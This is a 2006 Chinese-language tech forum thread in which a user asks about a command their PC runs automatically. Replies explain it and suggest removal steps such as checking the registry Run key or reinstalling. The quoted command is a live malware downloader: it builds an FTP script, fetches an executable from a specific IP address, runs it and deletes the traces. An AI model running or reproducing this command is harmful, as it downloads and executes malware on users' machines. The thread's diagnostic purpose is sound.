發表人: etman.hank    時間: 2006-10-2 09:24 PM     主題: [求助][電腦會自動執行奇怪的語法]

線在我的電腦會自動執行下列命令
"cmd /c echo OPEN 61.216.17.124 17987>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit"

請問各位大大這是啥東西...用防毒軟體又掃不掉 !!知道的煩請告知...謝謝 !!
發表人: mmcatdog    時間: 2006-10-2 10:10 PM

只能從啟動或啟動登入檔中停止
或是收尋一下redworld2.exe刪除(不過指令中好像已經刪除) 或先將61.216.17.124列為限制網站試試看
發表人: disabledman    時間: 2006-10-4 01:11 AM

它利用 echo 把 ftp 的指令寫入名為 "x" 的檔案中..
再利用 ftp 來執行..批次功能 下載 84785_redworld2.exe 檔案..
退出 ftp 後會自動把 x 檔案刪除
這應該是有問題的吧... 把 ftp.exe  rename 啊...
或找出 這段碼.. 在哪裡...
發表人: etman.hank    時間: 2006-10-4 10:22 PM

感謝大大們的回覆...

已使用終極絕招--重灌....就解決了...
發表人: schummy    時間: 2006-10-6 01:00 AM

建議上網小心一點囉,
這應該是上網頁中的吧!?
除了防毒軟體之外,
建議用firefox避開這些有問題的網頁。
發表人: rumble    時間: 2006-10-6 02:46 PM

引用:
etman.hank寫到:
感謝大大們的回覆...

已使用終極絕招--重灌....就解決了...

確實是終極一招..
不過去登入編輯程式修改應該是比較溫和又實在的方法吧.. ^^

XP就去 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 看看有無可疑程式或script.. 有的話砍掉就行..
這方法其實就已經能解決很多令人不愉快的狀況了..
不幸的話.. 下次有機會試試吧

歡迎光臨 TWed2k (http://twed2k.org/) Powered by Discuz! 4.1.0